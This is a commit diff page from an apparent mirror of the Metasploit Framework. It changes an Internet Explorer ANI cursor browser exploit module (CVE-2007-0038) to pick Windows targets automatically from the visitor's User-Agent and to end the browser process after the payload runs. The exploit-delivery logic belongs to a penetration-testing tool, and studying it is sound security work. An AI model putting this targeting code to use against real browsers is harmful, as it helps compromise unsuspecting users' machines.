infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Automatic target detection based on the user agent 

git-svn-id: file:///home/svn/framework3/trunk@4600 4d416f70-5f16-0410-b530-b9f4589650da
unstable
HD Moore 2007-04-01 21:05:05 +00:00
parent f0fcedf728
commit 775d8bc95b
1 changed files with 28 additions and 7 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

35
modules/exploits/windows/browser/ani_loadimage_chunksize.rb
View File

@ -55,8 +55,8 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
],
'DefaultOptions' =>
{
# Cause the shellcode to exit silently
'EXITFUNC' => 'seh',
# Cause internet explorer to exit after the code hits
'EXITFUNC' => 'process',
},
'Payload' =>
{
@ -75,7 +75,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
# Use multiple cursor URLs to try all targets at once
# This can result in multiple, sequential sessions
#
[ 'All Targets', { }],
[ 'Automatic', { }],
#
# The following targets use call [ebx+4], just like the original exploit
@ -126,6 +126,27 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
def on_request_uri(cli, request)
ros = /.*/
case request.headers['User-Agent']
when /Windows (NT |)4\.0/
ros = /NT 4/
when /Windows (NT |)5\.0/
ros = /2000/
when /Windows (NT |)5\.1/
ros = /XP/
when /Windows (NT |)5\.2/
ros = /2003/
when /Windows (NT |)6\.0/
ros = /Vista/
end
targ = nil
exts = ['bmp', 'wav', 'png', 'zip', 'tar']
gext = exts[rand(exts.length)]
@ -138,7 +159,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
mext = ruri =~ /\.(...)$/
if (not (mext and exts.include?($1)))
html =
"<html><head><title>" +
rand_text_alphanumeric(rand(128)+4) +
@ -147,10 +168,10 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
mytargs = (target.name =~ /All Targets/) ? targets : [target]
if target.name =~ /All Targets/
if target.name =~ /Automatic/
targets.each_index { |i|
next if not targets[i].ret
next if not targets[i].name =~ ros
html << generate_div(gext, i)
}
else
@ -201,7 +222,7 @@ class Exploits::Windows::Browser::IE_ANI_CVE_2007_0038 < Msf::Exploit::Remote
end
def generate_ani(payload, target)
# Build the first ANI header
anih_a = [
36, # DWORD cbSizeof